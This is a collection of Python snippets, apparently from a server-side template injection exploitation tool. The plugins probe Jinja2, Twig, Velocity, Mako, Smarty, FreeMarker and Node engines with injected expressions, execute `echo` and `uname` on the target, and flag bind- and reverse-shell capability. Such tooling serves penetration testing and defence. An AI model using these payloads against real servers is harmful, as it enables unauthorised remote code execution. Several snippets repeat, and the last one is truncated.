Exemple #1
0
    def _detect_dust(self):

        # Print what it's going to be tested
        log.info('%s plugin is testing rendering' % (
                self.plugin,
                )
        )

        for prefix, suffix in self._generate_contexts():

            payload = 'AA{!c!}AA'
            header_rand = rand.randint_n(10)
            header = str(header_rand)
            trailer_rand = rand.randint_n(10)
            trailer = str(trailer_rand)

            if 'AAAA' == self.render(
                    code = payload,
                    header = header,
                    trailer = trailer,
                    header_rand = header_rand,
                    trailer_rand = trailer_rand,
                    prefix = prefix,
                    suffix = suffix
                ):
                self.set('header', '%s')
                self.set('trailer', '%s')
                self.set('prefix', prefix)
                self.set('suffix', suffix)
                self.set('engine', self.plugin.lower())
                self.set('language', self.language)
                
                return
Exemple #2
0
    def inject(self,
               payload,
               header=None,
               header_rand=None,
               trailer=None,
               trailer_rand=None,
               prefix=None,
               suffix=None):

        header_rand = rand.randint_n(3) if header_rand == None else header_rand
        header = self.get('header_tag', '%(header)s') % ({
            'header': header_rand
        }) if header == None else header

        trailer_rand = rand.randint_n(
            3) if trailer_rand == None else trailer_rand
        trailer = self.get('trailer_tag', '%(trailer)s') % ({
            'trailer':
            trailer_rand
        }) if trailer == None else trailer

        prefix = self.get('prefix', '') if prefix == None else prefix
        suffix = self.get('suffix', '') if suffix == None else suffix

        injection = prefix + header + payload + trailer + suffix
        result = self.channel.req(injection)
        log.debug('[request %s]' % (self.plugin))

        # Cut the result using the header and trailer if specified
        if header:
            before, _, result = result.partition(str(header_rand))
        if trailer:
            result, _, after = result.partition(str(trailer_rand))

        return result.strip()
Exemple #3
0
    def _detect_dust(self):

        # Print what it's going to be tested
        log.info('%s plugin is testing rendering' % (self.plugin, ))

        for prefix, suffix in self._generate_contexts():

            payload = '{!c!}'
            header_rand = rand.randint_n(10)
            header = str(header_rand)
            trailer_rand = rand.randint_n(10)
            trailer = str(trailer_rand)

            if '' == self.render(code=payload,
                                 header=header,
                                 trailer=trailer,
                                 header_rand=header_rand,
                                 trailer_rand=trailer_rand,
                                 prefix=prefix,
                                 suffix=suffix):
                self.set('header', '%s')
                self.set('trailer', '%s')
                self.set('prefix', prefix)
                self.set('suffix', suffix)
                self.set('engine', self.plugin.lower())
                self.set('language', self.language)

                return
Exemple #4
0
    def detect_engine(self):

        randA = rand.randint_n(1)
        randB = rand.randint_n(1)

        # {{7*'7'}} and a{#b#}c work in freemarker as well
        payload = '{%% set a=%i*%i %%}{{a}}' % (randA, randB)
        expected = str(randA * randB)

        if expected == self.inject(payload):
            self.set('language', 'php')
            self.set('engine', 'twig')
Exemple #5
0
    def render(self, code, **kwargs):

        header_template = kwargs.get('header', self.get('header'))
        if header_template:
            header_rand = kwargs.get(
                'header_rand', self.get('header_rand', rand.randint_n(10)))
            header = header_template % ({'header': header_rand})
        else:
            header_rand = 0
            header = ''

        trailer_template = kwargs.get('trailer', self.get('trailer'))
        if trailer_template:
            trailer_rand = kwargs.get(
                'trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
            trailer = trailer_template % ({'trailer': trailer_rand})
        else:
            trailer_rand = 0
            trailer = ''

        prefix = kwargs.get('prefix', self.get('prefix', ''))
        suffix = kwargs.get('suffix', self.get('suffix', ''))

        blind = kwargs.get('blind', False)

        injection = header + code + trailer

        # Save the average HTTP request time of rendering in order
        # to better tone the blind request timeouts.
        result_raw = self.inject(code=injection,
                                 prefix=prefix,
                                 suffix=suffix,
                                 blind=blind)

        if blind:
            return result_raw
        else:
            result = None

            # Return result_raw if header and trailer are not specified
            if not header and not trailer:
                return result_raw

            # Cut the result using the header and trailer if specified
            if header:
                before, _, result_after = result_raw.partition(
                    str(header_rand))
            if trailer and result_after:
                result, _, after = result_after.partition(str(trailer_rand))

            return result.strip() if result else result
Exemple #6
0
    def blind_detected(self):

        if self.execute_blind('echo %s' % str(rand.randint_n(2))):
            self.set('execute_blind', True)
            self.set('write', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)
Exemple #7
0
    def rendered_detected(self):

        randA = rand.randstr_n(2)

        # Check this to avoid false positives
        payload = 'p %s' % randA
        expected = '<p>%s</p>' % randA

        if expected == self.render(payload):

            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            os = self.evaluate("""global.process.mainModule.require('os').platform()""")
            if os and re.search('^[\w-]+$', os):
                self.set('os', os)
                self.set('evaluate', self.language)
                self.set('write', True)
                self.set('read', True)

                expected_rand = str(rand.randint_n(2))
                if expected_rand == self.execute('echo %s' % expected_rand):
                    self.set('execute', True)
                    self.set('bind_shell', True)
                    self.set('reverse_shell', True)
Exemple #8
0
    def rendered_detected(self):

        randA = rand.randstr_n(2)
        randB = rand.randstr_n(2)

        payload = '"%s".join("%s")' % (randA, randB)
        expected = randA.join(randB)

        if expected == self.render(payload):

            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            os = self.evaluate(
                """'-'.join([__import__('os').name, __import__('sys').platform])"""
            )
            if os and re.search('^[\w-]+$', os):
                self.set('os', os)
                self.set('evaluate', self.language)
                self.set('write', True)
                self.set('read', True)

                expected_rand = str(rand.randint_n(2))
                if expected_rand == self.execute('echo %s' % expected_rand):
                    self.set('execute', True)
                    self.set('bind_shell', True)
                    self.set('reverse_shell', True)
Exemple #9
0
    def detect_exec(self):

        expected_rand = str(rand.randint_n(2))

        if expected_rand == self.execute('echo %s' % expected_rand):
            self.set('exec', True)
            self.set('os', self.execute("uname"))
Exemple #10
0
    def detect_exec(self):

        expected_rand = str(rand.randint_n(2))

        if expected_rand == self.execute('echo %s' % expected_rand):
            self.set('exec', True)
            self.set('os', self.execute("uname"))
Exemple #11
0
    def rendered_detected(self):

        randA = rand.randstr_n(2)
        randB = rand.randstr_n(2)

        # Check this to avoid detecting Twig as Jinja2
        payload = '{{"%s".join("%s")}}' % (randA, randB)
        expected = randA.join(randB)

        if expected == self.render(payload):

            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            os = self.evaluate("""'-'.join([__import__('os').name, __import__('sys').platform])""")
            if os and re.search('^[\w-]+$', os):
                self.set('os', os)
                self.set('evaluate', self.language)
                self.set('write', True)
                self.set('read', True)

                expected_rand = str(rand.randint_n(2))
                if expected_rand == self.execute('echo %s' % expected_rand):
                    self.set('execute', True)
                    self.set('bind_shell', True)
                    self.set('reverse_shell', True)
Exemple #12
0
    def rendered_detected(self):

        randA = rand.randstr_n(2)

        # Check this to avoid false positives
        payload = 'p %s' % randA
        expected = '<p>%s</p>' % randA

        if expected == self.render(payload):

            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            os = self.evaluate(
                """global.process.mainModule.require('os').platform()""")
            if os and re.search('^[\w-]+$', os):
                self.set('os', os)
                self.set('evaluate', self.language)
                self.set('write', True)
                self.set('read', True)

                expected_rand = str(rand.randint_n(2))
                if expected_rand == self.execute('echo %s' % expected_rand):
                    self.set('execute', True)
                    self.set('bind_shell', True)
                    self.set('reverse_shell', True)
Exemple #13
0
    def detect_exec(self):

        expected_rand = str(rand.randint_n(2))

        if expected_rand == self.execute('echo %s' % expected_rand):
            self.set('exec', True)
            # TODO: manage Window environment
            self.set('os', self.execute("uname"))
Exemple #14
0
    def detect_engine(self):

        expected_rand = str(rand.randint_n(1))
        payload = '#set($p=%(payload)s)\n$p\n' % ({'payload': expected_rand})

        if expected_rand == self.inject(payload):
            self.set('language', 'java')
            self.set('engine', 'velocity')
Exemple #15
0
    def detect_exec(self):

        expected_rand = str(rand.randint_n(2))

        if expected_rand == self.execute('echo %s' % expected_rand):
            self.set('exec', True)
            # TODO: manage Window environment
            self.set('os', self.execute("uname"))
Exemple #16
0
    def detect_engine(self):

        expected_rand = str(rand.randint_n(1))
        payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })

        if expected_rand == self.inject(payload):
            self.set('language', 'java')
            self.set('engine', 'velocity')
Exemple #17
0
    def _detect_render(self):

        render_action = self.actions.get('render')
        if not render_action:
            return

        # Print what it's going to be tested
        log.info('%s plugin is testing rendering with tag %s' % (
            self.plugin,
            repr(render_action.get('render') % ({
                'code': '*'
            })),
        ))

        for prefix, suffix in self._generate_contexts():

            # Prepare base operation to be evalued server-side
            randA = rand.randint_n(1)
            randB = rand.randint_n(1)
            expected = str(randA * randB)

            payload = render_action.get('render') % ({
                'code':
                '%s*%s' % (randA, randB)
            })
            header_rand = rand.randint_n(10)
            header = render_action.get('header') % ({'header': header_rand})
            trailer_rand = rand.randint_n(10)
            trailer = render_action.get('trailer') % ({
                'trailer': trailer_rand
            })

            # First probe with payload wrapped by header and trailer, no suffex or prefix
            if expected == self.render(code=payload,
                                       header=header,
                                       trailer=trailer,
                                       header_rand=header_rand,
                                       trailer_rand=trailer_rand,
                                       prefix=prefix,
                                       suffix=suffix):
                self.set('render', render_action.get('render'))
                self.set('header', render_action.get('header'))
                self.set('trailer', render_action.get('trailer'))
                self.set('prefix', prefix)
                self.set('suffix', suffix)
                return
Exemple #18
0
    def detect_engine(self):

        # TODO: remove this as already performed on discovery phase
        expected_rand = str(rand.randint_n(1))
        payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })

        if expected_rand == self.render(payload):
            self.set('language', 'java')
            self.set('engine', 'velocity')
Exemple #19
0
    def blind_detected(self):

        self.set('engine', self.plugin.lower())
        self.set('language', self.language)

        if self.execute_blind('echo %s' % str(rand.randint_n(2))):
            self.set('execute_blind', True)
            self.set('write', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)
Exemple #20
0
    def blind_detected(self):

        self.set('engine', self.plugin.lower())
        self.set('language', self.language)

        if self.execute_blind('echo %s' % str(rand.randint_n(2))):
            self.set('execute_blind', True)
            self.set('write', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)
Exemple #21
0
    def detect_engine(self):

        randA = rand.randint_n(1)

        payload = '{{7*\'%s\'}}' % (randA)
        expected = str(randA*7)

        if expected == self.inject(payload):
            self.set('language', 'python')
            self.set('engine', 'twig')
Exemple #22
0
    def blind_detected(self):

        # Blind has been detected so code has been already evaluated
        self.set('evaluate_blind', self.language)

        if self.execute_blind('echo %s' % str(rand.randint_n(2))):
            self.set('execute_blind', True)
            self.set('write', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)
Exemple #23
0
    def _detect_render(self):

        render_action = self.actions.get('render')
        if not render_action:
            return

        # Print what it's going to be tested
        log.info('%s plugin is testing rendering with tag %s' % (
                self.plugin,
                repr(render_action.get('render') % ({'code' : '*' })),
            )
        )

        for prefix, suffix in self._generate_contexts():

            # Prepare base operation to be evalued server-side
            randA = rand.randint_n(1)
            randB = rand.randint_n(1)
            expected = str(randA*randB)

            payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
            header_rand = rand.randint_n(10)
            header = render_action.get('header') % ({ 'header' : header_rand })
            trailer_rand = rand.randint_n(10)
            trailer = render_action.get('trailer') % ({ 'trailer' : trailer_rand })

            # First probe with payload wrapped by header and trailer, no suffex or prefix
            if expected == self.render(
                    code = payload,
                    header = header,
                    trailer = trailer,
                    header_rand = header_rand,
                    trailer_rand = trailer_rand,
                    prefix = prefix,
                    suffix = suffix
                ):
                self.set('render', render_action.get('render'))
                self.set('header', render_action.get('header'))
                self.set('trailer', render_action.get('trailer'))
                self.set('prefix', prefix)
                self.set('suffix', suffix)
                return
Exemple #24
0
    def _detect_unreliable_render(self):

        render_action = self.actions.get('render')
        if not render_action:
            return

        # Print what it's going to be tested
        log.debug('%s plugin is testing unreliable rendering on text context' %
                  (self.plugin))

        # Prepare base operation to be evalued server-side
        randA = rand.randint_n(1)
        randB = rand.randint_n(1)
        expected = str(randA * randB)
        payload = render_action.get('render') % ({
            'code':
            '%s*%s' % (randA, randB)
        })

        # Probe with payload wrapped by header and trailer, no suffex or prefix.
        # Test if contained, since the page contains other garbage
        if expected in self.render(code=payload,
                                   header='',
                                   trailer='',
                                   header_rand=None,
                                   trailer_rand=None,
                                   prefix='',
                                   suffix=''):

            # Print if the first found unreliable renode
            if not self.get('unreliable_render'):
                log.info(
                    '%s plugin has detected unreliable rendering with tag %s, skipping'
                    % (self.plugin,
                       repr(render_action.get('render') % ({
                           'code': '*'
                       }))))

            self.set('unreliable_render', render_action.get('render'))
            self.set('unreliable', self.plugin)

            return
Exemple #25
0
    def detect_eval(self):

        expected_rand = str(rand.randint_n(1))
        payload = """print('%s');""" % expected_rand

        result_php_tag = self.evaluate(payload)

        # If {php} is sent back means is in secure mode
        if expected_rand == result_php_tag:
            self.set('eval', 'php')
            self.set('os', self.evaluate('echo PHP_OS;'))
Exemple #26
0
    def detect_eval(self):

        expected_rand = str(rand.randint_n(1))
        payload = """print('%s');""" % expected_rand

        result_php_tag = self.evaluate(payload)

        # If {php} is sent back means is in secure mode
        if expected_rand == result_php_tag:
            self.set('evaluate', 'php')
            self.set('os', self.evaluate('echo PHP_OS;'))
Exemple #27
0
    def render(self, code, **kwargs):

        header_rand = kwargs.get('header_rand', self.get('header_rand', rand.randint_n(10)))
        header = kwargs.get('header', self.get('header', '%(header)s') % ({ 'header' : header_rand }))

        trailer_rand = kwargs.get('trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
        trailer = kwargs.get('trailer', self.get('trailer', '%(trailer)s') % ({ 'trailer' : trailer_rand }))

        prefix = kwargs.get('prefix', self.get('prefix', ''))
        suffix = kwargs.get('suffix', self.get('suffix', ''))

        blind = kwargs.get('blind', False)

        injection = header + code + trailer

        # Save the average HTTP request time of rendering in order
        # to better tone the blind request timeouts.
        result_raw = self.inject(
            code = injection,
            prefix = prefix,
            suffix = suffix,
            blind = blind
        )

        if blind:
            return result_raw
        else:
            result = None

            # Return result_raw if header and trailer are not specified
            if not header and not trailer:
                return result_raw

            # Cut the result using the header and trailer if specified
            if header:
                before,_,result_after = result_raw.partition(str(header_rand))
            if trailer and result_after:
                result,_,after = result_after.partition(str(trailer_rand))

            return result.strip() if result else result
Exemple #28
0
    def _detect_unreliable_render(self):

        render_action = self.actions.get('render')
        if not render_action:
            return

        # Print what it's going to be tested
        log.debug('%s plugin is testing unreliable rendering on text context' % (
                self.plugin
            )
        )

        # Prepare base operation to be evalued server-side
        randA = rand.randint_n(1)
        randB = rand.randint_n(1)
        expected = str(randA*randB)
        payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })

        # Probe with payload wrapped by header and trailer, no suffex or prefix
        if expected == self.render(
                code = payload,
                header = '',
                trailer = '',
                header_rand = None,
                trailer_rand = None,
                prefix = '',
                suffix = ''
            ):

            self.set('render', render_action.get('render'))

            # Print if the first found unreliable renode
            if not self.get('unreliable'):
                log.info('%s plugin has detected unreliable rendering with tag %s, skipping' % (
                    self.plugin,
                    repr(self.get('render') % ({'code' : '*' })))
                )

            self.set('unreliable', self.plugin)
            return
Exemple #29
0
    def rendered_detected(self):

        expected_rand = str(rand.randint_n(2))
        if expected_rand == self.execute('echo %s' % expected_rand):
            self.set('execute', True)
            self.set('write', True)
            self.set('read', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)

            os = self.execute("""uname""")
            if os and re.search('^[\w-]+$', os):
                self.set('os', os)
Exemple #30
0
    def blind_detected(self):

        self.set("engine", self.plugin.lower())
        self.set("language", self.language)

        # Blind has been detected so code has been already evaluated
        self.set("evaluate_blind", self.language)

        if self.execute_blind("echo %s" % str(rand.randint_n(2))):
            self.set("execute_blind", True)
            self.set("write", True)
            self.set("bind_shell", True)
            self.set("reverse_shell", True)
Exemple #31
0
    def blind_detected(self):

        self.set('engine', self.plugin.lower())
        self.set('language', self.language)

        # Blind has been detected so code has been already evaluated
        self.set('evaluate_blind', self.language)

        if self.execute_blind('echo %s' % str(rand.randint_n(2))):
            self.set('execute_blind', True)
            self.set('write', True)
            self.set('bind_shell', True)
            self.set('reverse_shell', True)
Exemple #32
0
    def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):

        header_rand = rand.randint_n(3) if header_rand == None else header_rand
        header = self.get('header_tag', '%(header)s') % ({ 'header' : header_rand }) if header == None else header

        trailer_rand = rand.randint_n(3) if trailer_rand == None else trailer_rand
        trailer = self.get('trailer_tag', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer

        prefix = self.get('prefix', '') if prefix == None else prefix
        suffix = self.get('suffix', '') if suffix == None else suffix

        injection = prefix + header + payload + trailer + suffix
        result = self.channel.req(injection)
        log.debug('[request %s]\n  > %s\n  < %s' % (self.plugin, injection.replace('\n', '\n  > '), result.replace('\n', '  \n  < ')) )

        # Cut the result using the header and trailer if specified
        if header:
            before,_,result = result.partition(str(header_rand))
        if trailer:
            result,_,after = result.partition(str(trailer_rand))

        return result.strip()
Exemple #33
0
    def rendered_detected(self):

        os = self.evaluate("""global.process.mainModule.require('os').platform()""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #34
0
    def rendered_detected(self):

        os = self.render("""{{__import__('os').name + '-' + __import__('sys').platform}}""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #35
0
    def rendered_detected(self):

        os = self.evaluate("""echo PHP_OS;""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #36
0
    def rendered_detected(self):

        os = self.render(
            """<% import sys, os; x=os.name; y=sys.platform; %>${x}-${y}""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #37
0
    def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):

        header_rand = rand.randint_n(10) if header_rand == None else header_rand
        header = self.get('header_fmt', '%(header)s') % ({ 'header' : header_rand }) if header == None else header

        trailer_rand = rand.randint_n(10) if trailer_rand == None else trailer_rand
        trailer = self.get('trailer_fmt', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer

        prefix = self.get('prefix', '') if prefix == None else prefix
        suffix = self.get('suffix', '') if suffix == None else suffix

        injection = prefix + header + payload + trailer + suffix
        log.debug('[request %s] %s' % (self.plugin, repr(self.channel.url)))

        result_raw = self.channel.req(injection)
        result = None

        # Cut the result using the header and trailer if specified
        if header:
            before,_,result_after = result_raw.partition(str(header_rand))
        if trailer and result_after:
            result,_,after = result_after.partition(str(trailer_rand))

        return result.strip() if result else result
Exemple #38
0
    def rendered_detected(self):

        self.set("engine", self.plugin.lower())
        self.set("language", self.language)

        os = self.render("""<% import sys, os; x=os.name; y=sys.platform; %>${x}-${y}""")
        if os and re.search("^[\w-]+$", os):
            self.set("os", os)
            self.set("evaluate", self.language)
            self.set("write", True)
            self.set("read", True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute("echo %s" % expected_rand):
                self.set("execute", True)
                self.set("bind_shell", True)
                self.set("reverse_shell", True)
Exemple #39
0
    def rendered_detected(self):

        self.set('engine', self.plugin.lower())
        self.set('language', self.language)

        os = self.evaluate("""require('os').platform()""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #40
0
    def rendered_detected(self):

        self.set('engine', self.plugin.lower())
        self.set('language', self.language)

        os = self.evaluate("""global.process.mainModule.require('os').platform()""")
        if os and re.search('^[\w-]+$', os):
            self.set('os', os)
            self.set('evaluate', self.language)
            self.set('write', True)
            self.set('read', True)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)
Exemple #41
0
    def rendered_detected(self):

        payload = "#* comm *#"

        if "" == self.render(payload):

            # Since the render format is pretty peculiar assume
            # engine name if render has been detected.
            self.set("engine", self.plugin.lower())
            self.set("language", self.language)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute("echo %s" % expected_rand):
                self.set("execute", True)

                os = self.execute("""uname""")
                if os and re.search("^[\w-]+$", os):
                    self.set("os", os)
Exemple #42
0
    def rendered_detected(self):

        payload = '#* comm *#'

        if '' == self.render(payload):

            # Since the render format is pretty peculiar assume
            # engine name if render has been detected.
            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)

                os = self.execute("""uname""")
                if os and re.search('^[\w-]+$', os):
                    self.set('os', os)
Exemple #43
0
    def rendered_detected(self):

        randA = rand.randstr_n(1)
        randB = rand.randstr_n(1)

        payload = '%s<#--%s-->%s' % (randA, rand.randstr_n(1), randB)
        expected = randA + randB

        if expected == self.render(payload):
            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('write', True)
                self.set('read', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)

                os = self.execute("""uname""")
                if os and re.search('^[\w-]+$', os):
                    self.set('os', os)
Exemple #44
0
    def rendered_detected(self):

        randA = rand.randstr_n(1)
        randB = rand.randstr_n(1)

        payload = '%s<#--%s-->%s' % (randA, rand.randstr_n(1), randB)
        expected = randA + randB

        if expected == self.render(payload):
            self.set('engine', self.plugin.lower())
            self.set('language', self.language)

            expected_rand = str(rand.randint_n(2))
            if expected_rand == self.execute('echo %s' % expected_rand):
                self.set('execute', True)
                self.set('write', True)
                self.set('read', True)
                self.set('bind_shell', True)
                self.set('reverse_shell', True)

                os = self.execute("""uname""")
                if os and re.search('^[\w-]+$', os):
                    self.set('os', os)
Exemple #45
0
    def render(self, code, **kwargs):

        # If header == '', do not send headers
        header_template = kwargs.get('header')
        if header_template != '':
            
            header_template = kwargs.get('header', self.get('header'))
            if not header_template:
                header_template = self.actions.get('render',{}).get('header')
                
            if header_template:
                header_rand = kwargs.get('header_rand', self.get('header_rand', rand.randint_n(10)))
                
                if '%(header)s' in header_template:
                    header = header_template % ({ 'header' : header_rand })
                else:
                    header = header_template
        else:
            header_rand = 0
            header = ''


        # If trailer == '', do not send headers
        trailer_template = kwargs.get('trailer')
        if trailer_template != '':
                
            trailer_template = kwargs.get('trailer', self.get('trailer'))
            if not trailer_template:
                trailer_template = self.actions.get('render',{}).get('trailer')
                        
            if trailer_template:
                trailer_rand = kwargs.get('trailer_rand', self.get('trailer_rand', rand.randint_n(10)))

                if '%(trailer)s' in trailer_template:
                    trailer = trailer_template % ({ 'trailer' : trailer_rand })
                else:
                    trailer = trailer_template

        else:
            trailer_rand = 0
            trailer = ''
            
        payload_template = kwargs.get('render', self.get('render'))
        if not payload_template:
            payload_template = self.actions.get('render',{}).get('render')
        if not payload_template:
            # Exiting, actions.render.render is not set
            return None
        
        payload = payload_template % ({ 'code': code })
            
        prefix = kwargs.get('prefix', self.get('prefix', ''))
        suffix = kwargs.get('suffix', self.get('suffix', ''))

        blind = kwargs.get('blind', False)
        
        injection = header + payload + trailer
        
        # Save the average HTTP request time of rendering in order
        # to better tone the blind request timeouts.
        result_raw = self.inject(
            code = injection,
            prefix = prefix,
            suffix = suffix,
            blind = blind
        )

        if blind:
            return result_raw
        else:
            result = ''

            # Return result_raw if header and trailer are not specified
            if not header and not trailer:
                return result_raw

            # Cut the result using the header and trailer if specified
            if header:
                before,_,result_after = result_raw.partition(str(header_rand))
            if trailer and result_after:
                result,_,after = result_after.partition(str(trailer_rand))

            return result.strip() if result else result
Exemple #46
0
    def render(self, code, **kwargs):

        # If header == '', do not send headers
        header_template = kwargs.get('header')
        if header_template != '':

            header_template = kwargs.get('header', self.get('header'))
            if not header_template:
                header_template = self.actions.get('render', {}).get('header')

            if header_template:
                header_rand = kwargs.get(
                    'header_rand', self.get('header_rand', rand.randint_n(10)))

                if '%(header)s' in header_template:
                    header = header_template % ({'header': header_rand})
                else:
                    header = header_template
        else:
            header_rand = 0
            header = ''

        # If trailer == '', do not send headers
        trailer_template = kwargs.get('trailer')
        if trailer_template != '':

            trailer_template = kwargs.get('trailer', self.get('trailer'))
            if not trailer_template:
                trailer_template = self.actions.get('render',
                                                    {}).get('trailer')

            if trailer_template:
                trailer_rand = kwargs.get(
                    'trailer_rand', self.get('trailer_rand',
                                             rand.randint_n(10)))

                if '%(trailer)s' in trailer_template:
                    trailer = trailer_template % ({'trailer': trailer_rand})
                else:
                    trailer = trailer_template

        else:
            trailer_rand = 0
            trailer = ''

        payload_template = kwargs.get('render', self.get('render'))
        if not payload_template:
            payload_template = self.actions.get('render', {}).get('render')
        if not payload_template:
            # Exiting, actions.render.render is not set
            return None

        payload = payload_template % ({'code': code})

        prefix = kwargs.get('prefix', self.get('prefix', ''))
        suffix = kwargs.get('suffix', self.get('suffix', ''))

        blind = kwargs.get('blind', False)

        injection = header + payload + trailer

        # Save the average HTTP request time of rendering in order
        # to better tone the blind request timeouts.
        result_raw = self.inject(code=injection,
                                 prefix=prefix,
                                 suffix=suffix,
                                 blind=blind)

        if blind:
            return result_raw
        else:
            result = ''

            # Return result_raw if header and trailer are not specified
            if not header and not trailer:
                return result_raw

            # Cut the result using the header and trailer if specified
            if header:
                before, _, result_after = result_raw.partition(
                    str(header_rand))
            if trailer and result_after:
                result, _, after = result_after.partition(str(trailer_rand))

            return result.strip() if result else result
Exemple #47
0
    def _detect_context(self):

        # Prepare base operation to be evalued server-side
        randA = rand.randint_n(1)
        randB = rand.randint_n(1)
        expected = str(randA*randB)

        # Prepare first detection payload and header
        payload = self.render_tag % ({ 'payload': '%s*%s' % (randA, randB) })
        header_rand = rand.randint_n(3)
        header = self.header_tag % ({ 'header' : header_rand })
        trailer_rand = rand.randint_n(3)
        trailer = self.trailer_tag % ({ 'trailer' : trailer_rand })

        log.debug('%s: Trying to inject in text context' % self.plugin)

        # First probe with payload wrapped by header and trailer, no suffex or prefix
        if expected == self.inject(
                payload = payload,
                header = header,
                trailer = trailer,
                header_rand = header_rand,
                trailer_rand = trailer_rand,
                prefix = '',
                suffix = ''
            ):
            self.set('render_tag', self.render_tag)
            self.set('header_tag', self.header_tag)
            self.set('trailer_tag', self.trailer_tag)
            return

        log.debug('%s: Injection in text context failed, trying to inject in code context' % self.plugin)

        # If not found, try to inject all the prefix and suffix pairs falling below the level
        for ctx in self.contexts:
            if self.channel.args.get('level') > ctx.get('level', 1):
                break
            if expected == self.inject(
                    payload = payload,
                    header = header,
                    trailer = trailer,
                    header_rand = header_rand,
                    trailer_rand = trailer_rand,
                    prefix = ctx.get('prefix', ''),
                    suffix = ctx.get('suffix', '')
                ):
                self.set('render_tag', self.render_tag)
                self.set('header_tag', self.header_tag)
                self.set('trailer_tag', self.trailer_tag)
                self.set('prefix', ctx.get('prefix', ''))
                self.set('suffix', ctx.get('suffix', ''))

                return

        log.debug('%s: Injection in code context failed, trying to inject only payload with no header' % self.plugin)

        # As last resort, just inject without header and trailer and
        # see if expected is contained in the response page
        if expected in self.inject(
                payload = payload,
                header = '',
                trailer = '',
                header_rand = 0,
                trailer_rand = 0,
                prefix = '',
                suffix = ''
            ):
            self.set('render_tag', self.render_tag)
            return
Exemple #48
0
    def _detect_context(self):

        # Prepare base operation to be evalued server-side
        randA = rand.randint_n(1)
        randB = rand.randint_n(1)
        expected = str(randA*randB)

        # Prepare first detection payload and header
        payload = self.render_fmt % ({ 'payload': '%s*%s' % (randA, randB) })
        header_rand = rand.randint_n(10)
        header = self.header_fmt % ({ 'header' : header_rand })
        trailer_rand = rand.randint_n(10)
        trailer = self.trailer_fmt % ({ 'trailer' : trailer_rand })

        log.debug('%s: Trying to inject in text context' % self.plugin)

        # First probe with payload wrapped by header and trailer, no suffex or prefix
        if expected == self.inject(
                payload = payload,
                header = header,
                trailer = trailer,
                header_rand = header_rand,
                trailer_rand = trailer_rand,
                prefix = '',
                suffix = ''
            ):
            self.set('render_fmt', self.render_fmt)
            self.set('header_fmt', self.header_fmt)
            self.set('trailer_fmt', self.trailer_fmt)
            return

        log.debug('%s: Injection in text context failed, trying to inject in code context' % self.plugin)

        # Loop all the contexts
        for ctx in self.contexts:

            # If --force-level skip any other level
            force_level = self.channel.args.get('force_level')
            if force_level and force_level[0] and ctx.get('level') != int(force_level[0]):
                continue
            # Skip any context which is above the required level
            if not force_level and ctx.get('level') > self.channel.args.get('level'):
                continue

            # The suffix is fixed
            suffix = ctx.get('suffix', '') % ()
            
            # Generate closures whether prefix has closure format string and 'closure' element
            if '%(closure)s' in ctx.get('prefix') and ctx.get('closures'):
                closures = self._generate_closures(ctx)
                prefix = ctx.get('prefix', '%(closure)s') % ( { 'closure' : '' } )
            # Else, inject a fake element to perform a single run
            else:
                closures = [ '' ]
                prefix = '%(closure)s' + ctx.get('prefix')

            log.info('%s plugin is testing %s*%s code context escape with %i mutations%s' % (
                            self.plugin,
                            repr(prefix).strip("'"),
                            repr(suffix).strip("'"),
                            len(closures),
